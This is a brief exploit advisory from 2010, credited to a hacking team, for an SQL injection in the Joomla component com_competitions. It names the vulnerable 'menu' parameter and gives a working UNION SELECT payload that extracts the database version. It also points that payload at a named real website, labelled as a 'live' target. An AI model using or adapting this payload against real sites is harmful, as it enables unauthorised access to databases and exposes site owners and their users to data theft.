======================================================================= Joomla Component (com_competitions) SQL Injection ======================================================================= # Joomla Component (com_competitions) SQL Injection # Date: 29/11/2010 # Author: s4r4d0 # Contact: s4r4d0[at]yahoo[dot]com # Team: Fatal Error # Greetz: Ashiyane Members ! # Made in Brazil ========================================================================== ========================================================================== [+] vuln: http://www.site.com/index.php?option=com_competitions&menu=[Sql injection] [+] live: http://www.windsurfonline.fr/index.php?option=com_competitions&menu=90 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18,19,20,21,22,23,24,25--